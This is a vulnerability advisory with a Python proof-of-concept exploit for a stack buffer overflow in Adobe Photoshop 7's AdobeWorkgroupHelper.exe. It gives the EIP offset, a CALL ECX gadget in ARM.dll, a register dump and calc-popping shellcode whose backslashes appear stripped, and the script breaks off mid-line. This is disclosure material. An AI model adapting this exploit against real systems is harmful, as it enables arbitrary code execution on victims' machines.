[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt Vendor: ================================ www.adobe.com Product: ================================= AdobeWorkgroupHelper.exe v2.8.3.3 Part of Photoshop 7.0 circa 2002 Vulnerability Type: =========================== Stack Based Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ===================== AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality, that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow exploit. Resluting in arbitrary code execution undermining the integrity of the program. We can control EIP register at about 5,856 bytes, our shellcode will point to ECX register. Tested successfully on Windows 7 SP1 Exploit code(s): =============== Use below python script to exploit... import struct,os,subprocess #Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit #Tested Windows 7 SP1 #------------------------------------ #by hyp3rlinx - apparitionsec@gmail.com #hyp3rlinx.altervista.org #============================================================== # #0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3 #(C:Program Files (x86)Common FilesAdobeWorkflowARM.dll) #=============================================================== ''' Quick Register dump... EAX 00270938 ECX 00270A7C <---------------BOOM! EDX 00A515FC ASCII "AAAAAA..." EBX 41414140 ESP 0018FEB0 EBP 0018FED0 ESI 00000000 EDI 41414141 EIP 004585C8 AdobeWor.004585C8 C 0 ES 002B 32bit 0(FFFFFFFF) P 0 CS 0023 32bit 0(FFFFFFFF) A 0 SS 002B 32bit 0(FFFFFFFF) Z 0 DS 002B 32bit 0(FFFFFFFF) S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0(FFFFFFFF) D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ''' #shellcode to pop calc.exe Windows 7 SP1 sc=("x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B" "x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B" "x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31" "xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA" "x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14" "x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65" "x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC") vulnpgm="C:Program Files (x86)Common FilesAdobeWorkflowAdobeWorkgroupHelper.exe " #payload="A"*5852+"R"*4 #<---- control EIP register #our shellcode will point at ECX register, so we need to find an JMP or CALL ECX and point EIP to that address #where our malicious code resides, we find it in ARM.dll eip=struct.pack('